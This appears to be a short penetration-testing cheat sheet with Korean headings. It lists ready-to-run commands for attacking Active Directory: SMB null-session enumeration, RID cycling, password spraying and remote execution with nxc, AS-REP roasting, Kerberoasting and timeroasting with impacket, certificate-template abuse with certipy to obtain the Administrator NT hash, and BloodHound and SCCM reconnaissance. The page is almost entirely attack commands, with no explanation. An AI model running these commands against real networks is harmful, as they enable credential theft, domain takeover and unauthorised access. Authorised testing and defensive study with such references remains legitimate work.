Mindmap

SMB

# SMB / FTP 익명 로그인
nxc smb <dc-ip> -u '' -p ''
nxc smb <dc-ip> -u 'Guest' -p ''

# RID Cycling
nxc smb <dc-ip> -u '' -p '' --rid-brute

# 도메인 계정/공유 폴더 목록 열거
nxc smb <dc-ip> -u '' -p '' --users / --shares

# 인증 후 원격 명령 실행
nxc smb <dc-ip> -u 'wiki' -p 'Password123!' --exec-method wmiexec -X 'whoami'

# 스프레이
nxc smb <dc-ip> -u <user-list> -p 'Password123!' --continue-on-success

Kerberos

# AS Rep Roasting
impacket-GetNPUsers <Domain>/'' -usersfile <user-list> -dc-ip <dc-ip> 

# AS Requested Service Ticket
impacket-GetUserSPNs -no-preauth <user> -usersfile <user-list> -dc-host <dc-ip> <domain>/

# Timeroasting
python3 timeroast.py <dc-ip>

# Kerberoasting
impacket-GetUserSPNs <domain/user:pass> -request

ADCS

# 취약한 템플릿 열거
certipy-ad find -u <user> -p <pass> -dc-ip <dc-ip> -vulnerable -stdout -enable

# 인증서 요청
certipy-ad req -u <user> -p <pass> -ca <ca> -target <dc-fqdn> -template <template> -dc-ip <dc-ip> -upn Administrator

# NT해시 덤프
certipy-ad auth-pfx administrator.pfx -domain <domain> -dc-ip <dc-ip>

BloodHound

# bloodhound
bloodhound-python -d <domain> -u <user> -p <pass> -gc <domain> -c All --zip -nc <dc-ip>

# sharphound
./sharphound.exe -c All -d <domain>

SCCM

# sccm hunter
python3 sccmhunter.py find -u <user> -p <pass> -d <domain> -dc-ip <dc-ip> -debug

# ldeep
ldeep ldap -u <user> -p <pass> -d <domain> -s ldap://<dc-ip> sccm

Last updated

Was this helpful?